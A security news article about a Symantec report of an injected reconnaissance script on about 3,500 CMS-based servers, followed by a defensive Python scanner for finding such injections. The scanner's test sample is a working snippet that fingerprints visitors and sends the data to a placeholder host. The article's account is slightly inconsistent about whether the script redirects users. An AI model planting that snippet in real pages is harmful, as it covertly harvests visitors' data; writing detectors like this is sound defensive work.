Malicious Script Infects 3,500 Servers Globally

A malicious script that has infected over 3,500 public servers worldwide is exposing visitors to potential malware attacks by redirecting them to compromised websites.

Security firm Symantec has determined that a malicious script that has compromised over 3,500 public servers around the world is redirecting unsuspecting victims to compromised websites that may be used to download and spread malware.

The company’s Intrusion Prevention System signature detects hidden scripts injected into a compromised website that may redirect users to a site hosting malicious code. The signature fires when a user accesses a website hosting malicious code, whether compromised or otherwise. The security firm noted that all of the compromised websites used the same content management system.

Despite the worrying nature of the scale of the infection, there is no malware currently associated with the injection attack. The code does not redirect or lead to any malicious downloads either.

The largest share of the malicious websites, 47%, resided in the United States. India followed at 12%, then the United Kingdom, Italy and Japan at 6% each.

The compromised websites were from a variety of organizations and included educational websites with the .edu domain, government websites and business websites.

The script collects information such as:

  • Page title
  • Referrer – telling the attacker which site the user came from
  • Shockwave Flash version
  • User language
  • Monitor resolution
  • Host IP address
  • URL page address displayed by the browser

An excerpt from Symantec’s blog explains how the malicious script carries out its operation:

Once a compromised page has loaded in the user’s browser, the malicious script waits 10 seconds and then runs remote JavaScript code, which in turn runs additional scripts. There are typically two to five additional scripts included as a chain to hide the infection from the victim.

As there are no signs of malware, the attacks are likely a reconnaissance operation to learn about targets and harvest information that could be used in a later attack. The same injection could later be turned to delivering advertisements, SEO poisoning, or, if cybercriminals modify the code, delivering malware to users.

The security firm recommends a complete clean-up of affected websites as a mitigation measure. Beyond changing the admin password, a full scan and a check of the web server’s files for backdoors are recommended.
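A site owner doing the recommended check of web server files needs something to look for. The following heuristic scanner is an added example, not Symantec’s IPS signature or any code from the article: it flags inline scripts that show the behaviour described above (a setTimeout delay, then loading JavaScript from another host, together with reads of the page title, referrer, Flash plugin, language, screen size and URL listed earlier). The regexes, the scoring threshold, the file extensions and the sample HTML are all this example’s own assumptions, and the remote host in the sample is a placeholder, not an indicator from the campaign.

```python
"""Heuristic scan of web files for an injected delay-then-load-remote-script.

Added example (not Symantec's signature or any code from the article). It
looks for an inline script that waits via setTimeout, then loads JavaScript
from another host, and reads page/browser details. Patterns, thresholds and
sample HTML are this example's own assumptions.
"""
import re
from pathlib import Path

# Inline <script> bodies; <script src=...></script> tags have nothing to inspect.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)

# setTimeout(callback, delay): the article reports a 10-second wait (10000 ms).
DELAY_RE = re.compile(r"setTimeout\s*\(.*?,\s*(\d+)\s*\)", re.DOTALL)

# Ways an inline script pulls further JavaScript from another host.
REMOTE_LOADER_RE = re.compile(
    r"createElement\s*\(\s*['\"]script['\"]\s*\)"   # dynamic <script> element
    r"|document\.write\s*\(.*?<script"              # written <script> tag
    r"|\.src\s*=\s*['\"]?(?:https?:)?//",           # absolute/protocol-relative src
    re.IGNORECASE | re.DOTALL,
)

# Browser-side reads matching the data the article says the script collects.
# The host IP is absent: a browser cannot read it; the remote host simply sees
# it on the connection the loader opens.
FINGERPRINT_MARKERS = {
    "page title": r"document\.title",
    "referrer": r"document\.referrer",
    "flash version": r"Shockwave\s*Flash|navigator\.plugins",
    "user language": r"navigator\.(?:language|userLanguage)",
    "screen resolution": r"screen\.(?:width|height)",
    "page url": r"(?:location|document)\.(?:href|URL)",
}


def analyze_script(body: str) -> dict:
    """Score one script body. 'suspicious' needs a remote loader plus either a
    timer delay or at least three fingerprint reads (assumed threshold)."""
    delays = [int(d) for d in DELAY_RE.findall(body)]
    fingerprint = [n for n, pat in FINGERPRINT_MARKERS.items() if re.search(pat, body)]
    remote = REMOTE_LOADER_RE.search(body) is not None
    return {
        "delay_ms": max(delays, default=0),
        "remote_loader": remote,
        "fingerprint": fingerprint,
        "suspicious": remote and (bool(delays) or len(fingerprint) >= 3),
    }


def scan_html(html: str) -> list:
    """Return one finding per suspicious inline script in an HTML/PHP document."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        result = analyze_script(m.group(1))
        if result["suspicious"]:
            result["offset"] = m.start()
            result["snippet"] = m.group(1).strip()[:80]
            findings.append(result)
    return findings


def scan_tree(root, exts=(".html", ".htm", ".php", ".js")) -> dict:
    """Walk a web root (assumed extensions); a .js file is one script body."""
    report = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in exts:
            continue
        text = path.read_text(errors="replace")
        if path.suffix.lower() == ".js":
            result = analyze_script(text)
            hits = [result] if result["suspicious"] else []
        else:
            hits = scan_html(text)
        if hits:
            report[str(path)] = hits
    return report


# Constructed samples (not captured from any real site).
BENIGN_HTML = """<html><head><title>Campus News</title>
<script>
  // site navigation helper
  document.getElementById('menu').onclick = function () { toggleMenu(); };
</script></head><body><p>Welcome</p></body></html>"""

INJECTED_HTML = BENIGN_HTML.replace("</body>", """<script>
setTimeout(function () {
  var q = 't=' + encodeURIComponent(document.title) +
          '&r=' + encodeURIComponent(document.referrer) +
          '&l=' + navigator.language +
          '&s=' + screen.width + 'x' + screen.height +
          '&f=' + (navigator.plugins['Shockwave Flash'] ? 1 : 0) +
          '&u=' + encodeURIComponent(location.href);
  var s = document.createElement('script');
  s.src = 'http://stage1.example.invalid/c.js?' + q;  // placeholder host, not a real indicator
  document.body.appendChild(s);
}, 10000);
</script></body>""")

if __name__ == "__main__":
    print("benign:", scan_html(BENIGN_HTML))
    for f in scan_html(INJECTED_HTML):
        print("injected: delay=%dms reads=%s" % (f["delay_ms"], f["fingerprint"]))
```

Run `scan_tree("/var/www/html")` (path assumed) and review each hit by hand: legitimate analytics tags also load remote scripts and read the referrer, which is why the score requires the delay or several fingerprint reads rather than a remote loader alone. The scanner only inspects inline bodies, so off-site `<script src=...>` tags and server-side includes added through the CMS still need a separate review against a known-good copy of the site.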

Image credit: Wikimedia.